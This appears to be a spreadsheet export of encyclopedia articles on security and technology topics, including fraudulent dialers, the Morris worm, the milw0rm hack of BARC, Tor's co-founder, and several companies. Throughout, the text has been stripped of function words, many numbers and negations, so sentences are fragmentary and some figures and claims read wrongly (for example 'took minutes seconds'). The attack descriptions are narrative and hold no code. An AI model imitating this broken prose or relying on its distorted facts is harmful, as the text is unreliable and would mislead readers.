*power*, auto dialing, predictive dialing. dialing modes defined according campaign type business. preview preview dialing enables agents first view available information customer decide place call. addition information customer, agents also view history customer contact center. after viewing information customer, agent requests system make call. example, preview dialing useful debt collection campaigns allow agents view information customer define strategy starting talk customer. system delivers preview calls agents automatically, taking account priority call skills agent handle call. preview dialing keeps agents dialing calls manually. predictive predictive dialing state-of-the-art pacing mode used call large number customers within short period time. predictive dialing optimizes time agents reducing idle times connected calls freeing agents dialing calls. predictive dialing gathers statistics concerning duration calls, long takes calls answered, often calls answered. when agent become idle, system places several calls. predictive dialing campaigns achieve agent productivity minutes hour nuisance ratios less. system continually updating predictive dialing probabilities monitoring nuisance ratios performance compliance legislation. example, predictive dialing useful sales campaigns call large number contacts maximizing working time agents. performance predictive dialing takes consideration accuracy contact lists policies nuisance calls. contact list poor, performance predictive dialing campaign risk agents connected live contacts able business. power power used deliver pre-recorded message large call list. when call answered, power play audio file, collect touch tone responses speech command message, transfer call agent remove caller call list. words, technology allows computer interact humans voice dtmf tones input keypad. voice drop voice drop power ivr, except wait touch tone responses speech command message, playing message, call dropped, mostly used payment reminders similar. fraudulent dialer dialers necessary connect internet least non-broadband connections), dialers designed connect premium-rate numbers. providers dialers often search security holes operating system installed user's computer computer dial number, make money calls. alternatively, dialers inform user doing, promise special content, accessible special number. examples content include software download, (usually illegal) trojans posing mp3s, trojans posing pornography, 'underground' programs cracks keygens. cost setting service relatively low, amounting thousand dollars telecommunications equipment, whereupon unscrupulous operator typically take cost premium rate call, overheads own. users dsls similar broadband connections) usually affected. dialer downloaded installed, dialing possible regular phone numbers network users typically dial-up modem, any, connected phone line. however, isdn adapter additional analog modem installed, dialer might still able connection. malicious dialers identified following characteristics: download popup opens opening website. website small hint, any, price. download starts even cancel button clicked. dialer installs default connection without notice. dialer creates unwanted connections without user interaction. dialer show notice price (only dialing high price connection shown connected dialer cannot uninstalled, serious effort. installation routes computers running microsoft windows without anti-virus software proper updates could vulnerable visual basic-scripts install trojan horse changes values windows registry sets internet explorer security settings activex controls downloaded internet without warning. after change made, user accesses malicious page email message, start installing dialer. script also disables modem speaker messages normally come dialing network. users microsoft office outlook, outlook express internet explorer especially affected running activex controls javascript allowed latest security patches microsoft installed. march 2004, malicious dialers could installed fake anti-virus software. e-mail spam so-called "antivirus team" example, contained download links programs named "downloadtool.exe" "antivirus.exe", malicious dialers. other ways transmission include electronic greeting cards link pages tricks user install activex controls, turn install dialers background. therefore, links spam emails never opened, automatically started downloads canceled soon discovered, check dial-up internet whether displayed phone number unchanged. another protect oneself disable premium numbers one's phone services, course disables services. never foreign code privileged environment unless source trustworthy. also advisable protect oneself anti-malware programs. german regulatory august 2003, came effect germany called "gesetz bekämpfung missbrauchs (0)190er/(0)900er mehrwertdiensterufnummern" ("law combat misuse (0)190/(0)900 value added service numbers"). contains following regulations: forced price notices service providers. maximum price limits, legitimacy checks automatic disconnects. registration dialers. blocking dialers. right information consumers regtp.on march 2004 german federal supreme court karlsruhe decided fees usage dialers paid used without user's knowledge. united kingdom regulatory december 2016, ofcom (the office communications) announced changes call centre regulations. these focused persistent dialers make call residential telephone numbers. they also added extra clarity call centres approach issue silent abandoned calls.ofcom, also regulate abandoned call messages work. message state company name, reason calling importantly used opportunity market business. also predictive dialer system dialing many numbers, typically used call centers dialing automatically scanning list telephone numbers detect computers, usually nefarious purposes dialer management platform xxxdial historical example dialer/spyware references</t>
  </si>
  <si>
    <t>The Harley Medical Group</t>
  </si>
  <si>
    <t>harley medical group (thmg limited) private limited company head offices based london, england. specialises cosmetic surgery skin laser treatments history company founded 1983 australian entrepreneur, braham. established arana trading company (1983) several names including cavendish hair clinic limited (1984), harley medical centre limited (2013), harley medical group limited (2014) thmg limited (since 2014). implants scandal 2012, harley medical group knowingly fitted breast implants later found faulty. evidence showed implants could rupture leak industrial-grade silicone body. company washed hands business carried trading. every business involved scandal replaced faulty implants free charge. national health service (nhs) treated nearly harley medical's patients fitted defective implants. group faced legal claims 1,700 women fitted defective implants.mel braham, chairman thmg time, gave statement confirmed medicines healthcare products regulatory agency approved implants company used them. many clinics, including transforming lives, also supplied faulty implants. supplier implants, poly implant prothese (pip), fell liquidation 2011. hacking april 2014, harley medical group suffered cyber-attack exposed 500,000 people's personal information. reported 480,000 initial inquiry forms submitted online accessed attempt extort money company. company stated medical financial information compromised result, contacted police information commissioner's office regarding possible data breach. compliance company regulated care quality commission (cqc) england healthcare inspectorate wales (hiw) wales. implant usage compliant breast implant registry. part regulatory compliance, harley medical group surgeons registered general medical council (gmc) specialist register plastic surgeons. likewise, nurses registered nursing midwifery council (nmc). references external links official website</t>
  </si>
  <si>
    <t>Robb Engineering</t>
  </si>
  <si>
    <t>robb engineering metals manufacturer located amherst, nova scotia, canada early 1900s. originally started tinsmithy, factory eventually expanded manufacture boilers, electric engines small generator plants. some evidence exists attempts also made company design manufacture locomotive engines well small venture shipwork.in 1964 robb engineering acquired dominion bridge company. assets merged dominion's canada foundry subsidiary. these corporate changes workforce dominion bridge company's operations amherst undergo major changes following dissolution robb engineering. robb engineering gained notoriety 1990s blamed maker faulty open steel joists. poor welds weakened joists. cases roof joists experienced catastrophic failure, resulting least roof collapse. with collapse joists separate buildings confirmed, inspection governmental structures conducted eastern canada surveying many robb engineering's joists used. inspections costing millions dollars, found several thousand government buildings, several provinces across eastern canada, involved. unknown number private buildings could also involved, however statistical information recorded reflecting data. references coverage (references) news story dozens schools repair government finishes building inspections external links open steel joist information package province nova scotia owsj task review board warning historical essay company profile (circa 1967)</t>
  </si>
  <si>
    <t>Robert Tappan Morris</t>
  </si>
  <si>
    <t>robert tappan morris (born november 1965) american computer scientist entrepreneur. best known creating morris worm 1988, considered first computer worm internet.morris prosecuted releasing worm, became first person convicted then-new computer fraud abuse (cfaa). went cofound online store viaweb, first applications, later venture capital funding firm combinator, paul graham. later joined faculty department electrical engineering computer science massachusetts institute technology (mit), received tenure 2006. elected national academy engineering 2019. early life morris born 1965 parents robert morris anne farlow morris. senior robert morris computer scientist bell labs, helped design multics unix; later became chief scientist national computer security center, division national security agency (nsa). morris grew millington section long hill township, jersey, graduated delbarton school 1983.morris attended harvard university, later went graduate school cornell university. during first year there, designed computer worm (see below) disrupted many computers fledgling internet. this indicted year later. after serving conviction term, returned harvard complete doctor philosophy (ph.d.) supervision h.t. kung. finished 1999. morris worm morris' computer worm developed 1988, graduate student cornell university. released worm mit, rather cornell. worm exploited several vulnerabilities gain entry targeted systems, including: hole debug mode unix sendmail program buffer overflow overrun hole fingerd network service transitive trust enabled people setting network logins password requirements remote execution (rexec) remote shell (rsh), termed rexec/rshthe worm programmed check computer found determine infection already present. however, morris believed system administrators might defeat worm instructing computer report false positive. compensate possibility, morris programmed worm copy anyway, time, matter response infection-status interrogation. this level persistence design flaw: created system loads brought attention administrators, disrupted target computers. during ensuing trial, estimated cost "potential loss productivity" caused worm efforts remove different systems ranged $200 $53,000. criminal prosecution 1989, morris indicted violating united states code title u.s.c. 1030), computer fraud abuse (cfaa). first person indicted act. december 1990, sentenced three years probation, hours community service, fine $10,050 plus costs supervision. appealed, motion rejected following march. morris' stated motive trial demonstrate inadequacies current security measures computer networks exploiting security defects [he] discovered." completed sentence 1994. later life work morris' principal research interest computer network architectures includes work distributed hash tables chord wireless mesh networks roofnet. longtime friend collaborator paul graham. along cofounding companies, graham dedicated book ansi common lisp morris, named programming language generates online stores' pages rtml (robert morris language) honor. graham lists morris personal heroes, saying "he's never wrong." timeline 1983 graduated delbarton school morristown, jersey 1987 received bachelor arts (b.a.) harvard university. 1988 released morris worm (when graduate student cornell university) 1989 indicted computer fraud abuse (cfaa) 1986 july 1989; first person indicted 1990 convicted united states morris 1995 cofounded viaweb, start-up company made software building online stores (with paul graham) 1998 viaweb sold million yahoo, renamed software yahoo! store 1999 received ph.d. applied sciences harvard thesis titled scalable congestion control 1999 appointed assistant professor 2005 cofounded combinator, seed-stage startup venture capital funding firm, provides seed money, advice, connections 3-month programs year (with paul graham, trevor blackwell, jessica livingston) 2006 awarded tenure 2006 technical advisor cisco meraki 2008 released programming language arc, lisp dialect (with paul graham) 2010 awarded 2010 special interest group operating systems (sigops) mark weiser award 2015 elected fellow association computing machinery (acm, 2014) "contributions computer networking, distributed systems, operating systems." 2019 elected national academy engineering also list convicted computer criminals references further reading external links official website,</t>
  </si>
  <si>
    <t>Mobile harassment</t>
  </si>
  <si>
    <t>mobile harassment refers sending type text message, sext, photo message, video message, voicemail mobile phone causes receiver feel harassed, threatened, tormented, humiliated, embarrassed otherwise victimized. recognized form cyberbullying. prevalence mobile harassment emerged worldwide trend, prevalence mobile devices today. based recent studies, harassment mobile texting particularly prevalent united kingdom australia, united states, internet usually used. 2009, survey united kingdom showed approximately percent young participants reported victims mobile harassment, ranging name calling sending threatening text messages, sending photos videos intended frighten intimidate. another study queensland, australia, suggests number victims could even higher, finding 93.7 percent teenagers experienced mobile harassment kind. this study concluded girls tend experience—and perpetrate—more mobile bullying boys, although difference seen minor 2021 study, noted 1.8% increase girls cyberbully victims. what clear, however, transgender students cyberbullied rate 11.7% higher cisgender boys girls; conversely, transgender teenagers shown least likely offend behavior, non-heterosexual teenagers likely victims offenders. cyberbullying offending peaks around years old, victims peaks 14–15. researchers also revealed third adolescents harassed cyberbullied. this number could still expand considering fact victims recognize kind harassment want acknowledge humiliating itself.cases mobile harassment often transpire outside school; however, since perpetrators victims often classmates, harassment spill school environment. solutions since mobile harassment relatively phenomenon, current lack measures specifically address problem aside generic legislation. however, schools often adopt policies regulations could help deter incidence. instance, administrators prohibit students taking pictures sharing visual materials within school premises. there also proposals sought completely mobile devices school. waldorf schools implement strict anti-technology philosophy effectively mitigates cyberbullying least campus), something embraced many silicon valley families. system used 1,000 institutions across countries, including schools u.s. private organizations also increasingly adopting respective regulatory policies contribute tackling issue. this evident recent decision part facebook adopt internal harassment bullying policies. social media company, cited commonly used network harass people, also adopted measures enable "remove content appears purposefully target private individuals intention degrading shaming them.” awareness november 2009, mobile phones released advertising campaign united states used humor encourage teens think text. adverts featured james lipton. released series videos youtube tagline “before text, give ponder.” popular culture television show gossip girl contains many episodes storylines revolve around gossipy, misinterpreted questionable text messages. references external links resources help teens handle mobile harassment bullyinguk defeat online trolls retrieved 2017-02-23</t>
  </si>
  <si>
    <t>Devthon</t>
  </si>
  <si>
    <t>devthon process blends principles design thinking, co-creation, rapid prototyping seamless unified method trigger innovation. core event format brings interdisciplinary collaborative model solve challenges prototype experiences. devthon generally focused "area innovation" healthcare rural livelihood. participants different phases like immersion, ideation, design, prototyping (hacking), leading demonstrable proof concept. process differs hackathon emphasis immersion, discovery, design. devthons also time-constrained like hackathon, weeks. history devthons started 2014 three entrepreneurs, harish krishnan prashant venkatasubban. different thematic areas devthons organized include safety security communities, healthcare, rural livelihood, smart cities. largest-ever devthon organized bioasia conference 2015. references</t>
  </si>
  <si>
    <t>Mobolize</t>
  </si>
  <si>
    <t>mobolize software company enables leading service technology providers deliver policy-based security solutions mobile devices used employees, vendors partners outside corporate network, including managed unmanaged devices. patented, on-device data management engine uses intelligent, fine-grain routing analysis ensures broken apps services, thus allowing sase work mobile devices. built single code base device platforms, data management engine brings feature parity plus easier, faster maintenance upgrades major platforms windows, macos, ios, android, chromeos linux. result enhanced protection improved experience frustrate business users drive greater adoption security apps. partners delivering powerful solutions meet demands mobile device security including cloud, sase, zero trust secure gateway. 2022, mobolize chosen google cloud enable zero trust access enterprise endpoints including devices running android, ios, windows, macos linux. collaboration google's beyondcorp enterprise provide simple safe security enterprises' managed unmanaged devices outside corporate network. 2021, mobolize continued technology partnership akamai expand zero trust network access (ztna) capabilities endpoint devices. this continuation partnership akamai deliver security laptop, smartphone tablet devices announced 2020. 2013, sprint (now t-mobile t-mobile's acquisition sprint) announced technology partnership mobolize improve network performance enterprise users. october 2020, akamai mobolize announced partnership offer security endpoint devices enterprises. mobolize's data management engine support akamai enterprise threat protector, cloud secure gateway (swg). 2021, boost mobile introduced "privacy premium" product using secure wi-fi mobolize. mobolize recognized 2014 ctia winner telecom council showcase. 2015, mobolize recognized lightreading leading lights finalist best mobile product, also fiercewireless fierce innovation awards finalist network service delivery.the company philip mustain chairman ceo, david cohen chief business officer, william chow cto. philip mustain david cohen previously founders frontbridge technologies, acquired microsoft became microsoft exchange hosted services. william chow previously chief architect qlogic storage solutions group (formerly troika networks) security team lead stamps.com. references external links data optimization paradox</t>
  </si>
  <si>
    <t>Digital self-defense</t>
  </si>
  <si>
    <t>digital self-defense self-defense strategies internet users ensure digital security; say, protection confidential personal electronic information. internet security software provides initial protection setting firewall, well scanning computers malware, viruses, trojan horses, worms spyware. however information risk includes personal details birthdates, phone numbers, bank account, schooling details, sexuality, religious affiliations, email addresses passwords. this information often openly revealed social networking sites, leaving internet users vulnerable social engineering possibly internet crime. mobile devices, especially wi-fi, allow information shared inadvertently.digital self-defense requires internet users take active part guarding personal information. four strategies frequently suggested assist protection. computer security computer security context referring internet security software. ongoing security private information requires frequent updating virus spyware definitions ongoing developments malicious software cannot interfere with, copy, private information. email accounts usernames choice appropriate email account practice utilising email account separate personal business usage recreational usage strategy commonly used manage personal privacy. free ready availability email accounts sites yahoo, google hotmail allows protection personal identity different names identify email account. these throw-away accounts discarded replaced will, providing another level protection. choice username username required email accounts open accounts various official, commercial, recreational social networking sites. many cases, email address also utilised username. usernames correlate personal information names nicknames risk ones cryptic anonymous, particularly social recreational sites. password strength password mandatory security measure accompanies usernames. personal data construct passwords i.e. family members’ names, pet’s names birth dates increases risk confidential information easier crack long complicated passwords password strength strategy protecting personal information. password weak strong:a weak password cutekittens, strong password ?lacpas56ikms. according microsoft ideal password least characters length letters, punctuation, symbols, numbers, complexity added inclusion uppercase letters. managing personal information using privacy options social networking sites offer greater security risks personal electronic information sensitive, private confidential information personal identifiers routinely used create public profiles. many websites give options suppress amount personal information revealed customisation privacy settings. however privacy settings reset changes website occur. references also anonymity pseudonymity personally identifiable information</t>
  </si>
  <si>
    <t>Roger Dingledine</t>
  </si>
  <si>
    <t>roger dingledine american computer scientist known co-founded project. student mathematics, computer science, electrical engineering, dingledine also known pseudonym arma. december 2016, continues leadership role project, project leader, director, research director. education dingledine graduated bachelor science degree mathematics computer science 2000. then obtained master engineering electrical engineering computer science mit. career project developed dingledine—with nick mathewson paul syverson—under contract united states naval research laboratory. 2006, software developed distributed using proceeds electronic frontier foundation, project. described 2015, project develops maintains browser system, also known onion router free, open source sophisticated privacy tool provides anonymity surfing communication well developing maintaining software tools applications. december 2016, dingledine continues leadership role project, project leader, director, research director. isabela bagueros acts project's executive director. took role january 2019, previously project manager project since 2015. publications presentations dingledine written several highly cited papers, including design paper titled tor: second-generation onion router, usenix security "test time" award. other highly cited papers include mixminion’s protocols anonymous email, free haven project distributed anonymous storage service, various attacks vulnerabilities related anonymity technologies, economics network effects technologies anonymity.as advocate strong privacy, dingledine frequently invited speak security privacy, including academic conferences, (2014), (2007), periodic interviews. awards honors dingledine named 2006 thirty-five innovators under technology review, work internet anonymization technologies project. review described importance work way: dissident china uses web-based e-mail contact journalist canada. intelligence agency wants surveil foreign website. like every operation internet, activities leave tracks. online anonymity measures provide around problem; advanced tor, onion router. computer scientist roger dingledine developed 2012, dingledine initial developers tor, nick mathewson paul syverson, recognized foreign policy magazine global thinkers. media attention dingledine drawn attention leak documents edward snowden, public disclosure rules guiding operation xkeyscore, nsa's collection system, given xkeyscore's targeting project onion servers, including dingledine runs mit, serves directory authority system, well base operation mixminion mail service, host various gaming websites (from might collecting addresses). further reading roger dingledine publications indexed google scholar goodin, (2016-11-29). "firefox 0-day wild being used attack users". arstechnica. retrieved 2016-01-04. publicly released exploit works reliably wide range firefox versions. zetter, (2015-12-11). "tor hires leader help combat privacy" (print online). wired. retrieved 2016-01-04. zetter, (2014-07-03). "the targeting users privacy services, leaked code shows" (print online). wired. retrieved 2016-01-04. references</t>
  </si>
  <si>
    <t>Template:Onion Official site</t>
  </si>
  <si>
    <t>official site: {{{1}}}.onion (accessing link help)</t>
  </si>
  <si>
    <t>Milw0rm</t>
  </si>
  <si>
    <t>milw0rm group hacktivists best known penetrating computers bhabha atomic research centre (barc) mumbai, primary nuclear research facility india, june 1998. group conducted hacks political reasons, including largest mass hack time, inserting anti-nuclear weapons agenda peace message hacked websites. group's logo featured slogan "putting power back hands people."the barc attack generated heated debate security information world prevalent countries developing nuclear weapons information necessary ethics "hacker activists" "hacktivists," importance advanced security measures modern world filled people willing able break insecure international websites. exploit site milw0rm.com str0ke unaffiliated milw0rm hacker group. members little known members milw0rm, typical hacking groups, often conceal members' identities avoid prosecution. international hacking team "united internet" composed teenagers went aliases keystroke, extreemuk, savec0re, venomous. venomous, hailed zealand, extreemuk england, keystroke, savec0re, netherlands. went achieve modicum notoriety "hacked" website intentionally graffitied words here" across page, time investigation milw0rm attacks scotland yard. hundreds pages hosted mtv.com sported logo, including page read, here, greets milw0rm". later confirmed alleged "hack" publicity stunt promote appearance commentator named johnny fame 1998 video music awards. many puzzled apparent hack committed since hacker "known relatively high ethical standards."venomous claimed learned crack systems ehud tenenbaum, israeli hacker known analyzer. barc attack four days incident, five permanent members united nations security council, russia, united kingdom, france china, denounced india pakistan unilaterally declaring nuclear weapons states. attack, jacques gansler, undersecretary defense acquisition technology, warned military conference teenage hackers posed real threat" national security. night june 1998, workstations three continents, group used military .mil machine break lan, local area network, barc gained root access. center's website, connected lan, firewall secured enough prevent group entering gaining access confidential emails documents. emails included correspondence center's scientists relating development nuclear weapons analysis five recent nuclear tests. milw0rm took control servers posted statement anti-nuclear intentions center's website.in process break-in, multinational group teenagers united states, united kingdom zealand gained access five megabytes classified documents pertaining india's nuclear weapons program. savec0re erased data servers protest center's nuclear capabilities. display security breach publicly, changed center's webpage display mushroom cloud along anti-nuclear message phrase "don't think destruction cool, not".milw0rm came forward security flaws exploited barc's system, along thousands pages documents lifted server, concerning india's last five nuclear detonations. group's purpose attack protest nuclear testing, according savec0re, venomous correspondence wired's reporter james glave.after attack keystroke claimed breach taken minutes seconds" execute. many news organizations reported breathlessly teenagers penetrated nuclear research facility "less minutes." however, examining closely hacker's wording tone interview, especially specificity seconds" claim, apparent keystroke meant lighthearted answer question, "exactly long take you?". actual invasion took careful planning, routing servers throughout world three different continents, took days execute. indian news agency reported downloading thousands pages india's slow servers would taken much longer minutes. attack aftermath security breach first reported wired news. venomous claimed credit emailing wired reporter james glave documents obtained barc servers proof.after first denying incident occurred, barc officials admitted center indeed hacked emails downloaded. official barc downplayed severity importance incident, announcing security flaw resulted normal loophole sendmail," going state center bothered download version sendmail program, responsible center's email servers. center also admitted milw0rm's breach, site hacked again, time less severe consequences. forbes wrote perhaps hackers followed milw0rm's footsteps barc servers revealed insecure. website shut security upgraded. later, senior government official told zdnet indians known flaw chosen ignore creating opportunity milw0rm root servers. barc officials said none emails contained confidential information, group destroy data, computers contain important data isolated ones broken into.nevertheless, breach severe potential cause incident international proportions. forbes called "potentially devastating" hacking incident 1998. after attack, members group participated anonymous internet relay chat (irc) chat john vranesivich, founder hacking news website anti-online. keystroke explained wanted could sent threatening emails indian email server pakistani email server. group possessed malicious intentions, consequences south asian countries could catastrophic. reasons, milw0rm attack caused groups heighten security prevent invasion hackers. u.s. army announced, without giving evidence believed case, hacks might originated turkey, noting "turkey primary conduit cyber attacks." senior official said obtained material milw0rm purloined reviewing it—the official mention obtained information.later, wired revealed indian national self-proclaimed terrorist, khalid ibrahim, approached members milw0rm hacker groups irc—including masters downloading noid—and attempted classified documents them. according savec0re, ibrahim threatened kill hacker turn classified documents question. savec0re told kevin mitnick ibrahim first approached posing family member agent could grant immunity members milw0rm.the electronic disturbance theater released statement support applauding hacktivism maintaining computer break-ins sort cyber-terrorism claim.the event received wide international coverage, reports cnn, msnbc associated press days following. other attacks month barc incident, july 1998, milw0rm hacked british hosting company easyspace, putting anti-nuclear mushroom cloud message easyspace's websites, along text read: "this mass takeover goes people want peace world."wired reported incident perhaps "largest 'mass hack' ever undertaken." united states department defense adviser john arquilla later wrote largest hacks ever seen. some sites hacked incident world cup, wimbledon, ritz casino, drew barrymore, saudi royal family. text placed sites read part, "this mass takeover goes people want peace world... this tension good, scares much scares know could seriously escalate conflict india pakistan possibly even world iii, cannot happen... power keep world state peace."while scanning network weaknesses, members group came across easyspace, british company hosted many sites server. along members fellow hacking group ashtray lumberjacks, milw0rm revised mushroom cloud image text easyspace's websites less hour. vranesevich said mass hack rare effect intention: hackers seemed interested political purposes exposing computer security flaws.it also reported milw0rm broke turkish nuclear facility addition barc. also hacktivism 1984 network liberty alliance references external links mirrors hacked sites barc hack mass hack hacked site fantasyfootball.co.uk hacked hacked prince charles' bentley!"</t>
  </si>
  <si>
    <t>Military-digital complex</t>
  </si>
  <si>
    <t>military-digital complex (mdc) militarization cyber operations governments corporations, often monetary relationships computer programmers private companies military combat threat cyber terrorism warfare. cyber operations since 2000 increased dramatically, recent branch strategic command united states cyber command. cyber operations defined washington post "offensive defensive cyber digital) warfare, including fields computer network attack, computer network exploitation computer network defense; well traditional electronic warfare (e.g., jamming) intended deny adversary electronically dependent equipment "non-kinetic" means—that fighting electrons rather explosives."as cyber attacks become increasingly common threat security civilians highly classified governmental information, need combat threat means computer network operations computer network defense arisen. important note however protection component military-digital complex information warfare within complex used achieve military operations upper-hand economic exploits. military-digital complex contains many components align succinctly industrial counterpart, example defense contractors. although hired contractors explicitly named still expose complex complications principal–agent problem consequently moral hazard. seen progression nations move globally towards cyberwarfare, indeed cyber increasingly acknowledged "fifth domain warfare". necessity governmental bodies order maintain high standards within cyber army, example boasts "143 private companies involved secret cyber operations programs", however james gosler government specialist cyber security indicates severe shortage government cybersecurity specialists. history technology part since dawn warfare. neolithic tools daggers used weaponry clan rivalry long recorded history. bronze iron technological improvements namely advancements weaponry subsequently arrival complex industries. late 19th early 20th century weaponry advanced leaps bounds armaments mankind witnesses today, however even industry relatively independent government military. world world important factors consequent military-industrial complex. eric hobsbawm book extremes outlines categorically countries like japan, russia develop military industry support militaristic efforts, creating complex whereby economies straddled arms industry. consequently, procurement missiles, ballistics, nuclear weapons, destroyers submarines shows marked difference ancient acquisitions countries. dawn 21st century, world seen emergence digital equipment warfare, spanning satellite surveillance systems dedicated agencies united states cyber command fully equipped thousands professionals manning computers 24/365 basis order prevent cyber attack. computers long essential tool warfare, however warfare moves traditional frontiers land, sea, space "cyber space" computers becoming essential vital. gregory rattray, author strategic warfare cyberspace, explains history warfare information reaching well beyond military operation including financial crime economic espionage. history cyber warfare shows crosses global boundaries encompasses political agendas, attacks titan rain show attack networks computers situated china example. digital warfare progressed become evident human reliance technological equipment monitor essential utilities electricity grids proven cataclysmic. threat became increasingly relevant, emergence corporate players scene including names symantec, mcafee traditional defense contractors northrop grumman lockheed martin, cyber threat grows mankind's reliance corporate players aforementioned, creating iron triangle among government, military global security corporations. also list industrial complexes james langevin#cybersecurity michael mccaul#legislation references further reading geer, october 2008), "risky business military digital complex", risky.biz, retrieved april 2011 meer, haroon march 2011), lessons anonymous cyberwar, jazeera english, retrieved march 2011</t>
  </si>
  <si>
    <t>Mile2</t>
  </si>
  <si>
    <t>mile2 information technology security company develops provides proprietary accredited cybersecurity certifications. company's technology security programs utilized private public sectors, including boeing, canada's department national defense, national security agency, united states force, committee national security systems (cnss), u.s. federal bureau investigation others.mile2 developed provides internationally recognized, proprietary cybersecurity certifications, accredited cnss 4011-4016 approved national initiative cybersecurity security careers studies' (niccs) training schedule department homeland security. january 2013, mile2 entered collaborative partnership merit network provide cybersecurity courseware certifications michigan cyber range.in april 2021, mile2 opened office canada order "accommodate growing demand cybersecurity training certifications canadian government, corporate academia clients.". canadian office located ottawa, ontario.the company also involved training u.s. veterans private sector opportunities cybersecurity, holding training sessions veterans around nation. references external links mile2 official website mile2 twitter</t>
  </si>
  <si>
    <t>Mikud (company)</t>
  </si>
  <si>
    <t>mikud group (hebrew: קבוצת מיקוד) largest security cleaning companies israel. company employs 4,500 workers. company established 1984 soli elyashar. headquarters company located rival street, south aviv. company began jerusalem solely security company, later expanding services give full solution services clients. today mikud group made four specializing companies: mikud avtkha (hebrew: מיקוד אבטחה)- providing different security services government private entities. activities include security protection facilities, personnel, security physical protection facilities. moked mikud (hebrew: מוקד מיקוד)- operates alarm monitoring center mikud group. specializing emergency call services, operational reconnaissance electronic protection. cleanor (hebrew: קלינור)- providing cleaning services cleaning machines, cleaning materials. techniko (hebrew: טכניקו)- dealing building maintenance, technical services construction, well electricity works, water conditioner systems.since israeli ministry defense decided privatize israeli checkpoints operations west bank, mikud four israeli security companies provided services. references external links official website mikud avtaha official website moked mikud official website cleanor</t>
  </si>
  <si>
    <t>Midgard (software)</t>
  </si>
  <si>
    <t>midgard open source persistent storage framework. provides object-oriented replicated environment building data-intensive applications.midgard also ships midcom content management system (cms) built midgard framework. midcom's features include web-based authoring wysiwyg interfaces component interface installing additional functionalities, including wikis blogs.midgard built gnome stack libraries like glib libgda, language bindings python, objective-c php. communications applications written different languages happen d-bus. functionalities lamp (linux, apache, mysql php) platform. midgard also used phpcr, implementation java content repository standard. early 2000s (decade) also pure-php implementation midgard called midgard lite since re-implemented midgard-portable project.the project follows synchronized, month release cycle implemented several major open source projects like ubuntu gnome. because this, version numbering reflects year month release. version 8.09 ragnaroek designated "long term support" release.especially templating page composition features midgard received praise, earning honorary mentions several watch surveys. also score celebrity deathmatch 2009 etymology name midgard comes nordic mythology, meaning middle earth, world humans. most midgard developer community comes baltic region, project referred watch hanseatic league content management. history midgard project started early 1998 jukka zitting henri bergius finnish historical reenactment organization —harmaasudet— system publish material online.since organization resources maintain large development project itself, open source model chosen creating community contributors system. version midgard released public 1999. attracted steady stream users, development project flourished despite quite primitive early user interfaces.commercial services platform started appear early 2000. first adopters envida, dutch company realized potential midgard hosting purposes. first proprietary application platform hong kong linux center (hklc) nadmin studio content management system.in early 2000s (decade), midgard developers participated actively oscom, collaborative organization open source content management systems. this included development shared content editing clients like twingle tutorials various conferences. midgard also featured f.u.d., wyona pictures documentary oscom.first application connected content management nemein.net, professional services automation application released 2002 nemein, finnish midgard company. 2004 nemein.net suite renamed openpsa released open source licensing.by 2009, social services, like qaiku also adopted midgard content management platform. also runs organizations like helsinki university technology maemo. e-commerce implementations midgard include movie-tv online video rental service. used zealand government running country's egovernment portal.midgard seen non-web also, including providing synchronization tomboy note-taking application linux desktop.in addition regular content management, midgard seeing special application scenarios like lufthansa's system managing global marketing budgets hp's client documentation system.the midgard content repository library entered debian distribution november 2010. some parts history midgard recounted book open advice. licensing midgard core libraries midcom distributed lesser general public license (lgpl), license permits software freely used long dynamically linked user relink versions libraries. this license used library. this licensing scheme qualifies midgard free software developed open source model. official documentation licensed creative commons attribution-sharealike license supports free usage principles defined code. applications developed using midgard application programming interfaces (api) copyrighted licensed terms authors, enabling creation commercial products services based platform. also list content management systems geospatial content management system references external links official website</t>
  </si>
  <si>
    <t>Microsoft adCenter Analytics</t>
  </si>
  <si>
    <t>microsoft adcenter analytics (codenamed gatineau) microsoft's analytics solution. 2006, microsoft acquired deepmetrix corporation used analytics technology deliver adcenter analytics. competed google analytics tied microsoft adcenter google tied google analytics google adwords. this complaints webmasters, five dollar sign compared lack cost google analytics.features included: click visitor tracking marketing campaign reporting conversion tracking demographic geographic segmentationin march 2009, microsoft announced adcenter analytics would discontinued. existing accounts would operational till 2009. also analytics references external links keyword rank checker</t>
  </si>
  <si>
    <t>Template:Onion URL</t>
  </si>
  <si>
    <t>{{{1}}}.onion (accessing link help)</t>
  </si>
  <si>
    <t>Template:Category redirect</t>
  </si>
  <si>
    <t>this template used category pages.</t>
  </si>
  <si>
    <t>Template talk:Tor (anonymity network)</t>
  </si>
  <si>
    <t>don't remove redirects mercurywoodrose others, please remove redirects, they're important list notable software. --rezonansowy (talk contribs) 12:58, november 2013 (utc) well, wrong, navboxes navigate articles, highlight multiple topics covered single article. software notable enough, would article, section software entirely different article already listed navbox, linking article section fine. however, really tired silliness around tor, wont bother edit more. others sort whats happening. sure whatever worked fine, going worry more. thanks passion trying document stuff, sorry dont agree based understanding policy.mercurywoodrose (talk) 20:12, november 2013 (utc)please talk subject. --rezonansowy (talk contribs) 14:56, november 2013 (utc) expand template? looking make template:tor hidden services redundant, seems like things links would appropriate also appropriate): .onion, example. list hidden services (the article) seems also make sense include somewhere quite either existing sections. rhododendrites talk 21:36, june 2014 (utc)</t>
  </si>
  <si>
    <t>Template talk:Information Security Certifications</t>
  </si>
  <si>
    <t>listing indicate giac certifying body, sans, include certification right side table (except exist articles.) (talk) 22:54, february 2010 (utc) fixed sans giac added gcfa, article seems appropriate list. articles created, feel free list. rosspatterson (talk) 23:38, february 2010 (utc) right title template? there debate difference computer security, information security information assurance; information assurance short explanation. think certification listed information assurance information security: look certification names. computer security used limited term. information security wider term computer security: proposed change least first line navbox) name template. moving template name "information security certifications" would better. know redirect work transclusions, otherwise change (eventually bot) references. noticed every certification listed template transclude template itself. according opinion least article transclude template. computer security computer insecurity certification/professionalism sections information assurance sections certifications recently worked information security#professional association certification. think best solution write article perhaps information security certification, moving current versions mentioned sections dealing certification inserting {{main|information security certification}} articles. eventually article categorize different certifications post similar sections cited articles. suggest welcome comments posted template_talk:computer_security_certifications --pastore italy (talk) 11:59, december 2010 (utc) this sounds like reasonable suggestion. whether disagree precepts category specific certification irrelevant, think categorized certs, disambiguated necessary. thank contributions. sephiroth storm (talk) 13:27, december 2010 (utc) updated list security certifications needing adding article https://en.wikipedia.org/wiki/list_of_computer_security_certifications ec-council, giac, isaca isc2 certifications listed. easy added template? corresponding articles, articles example corresponding giac article. much worked needed. send help. preceding unsigned comment added 60.240.207.146 (talk) 04:32, september 2015 (utc) giac currently missing template, whereas ec-council, isaca isc2 included. giac missing?--bibsol (talk) 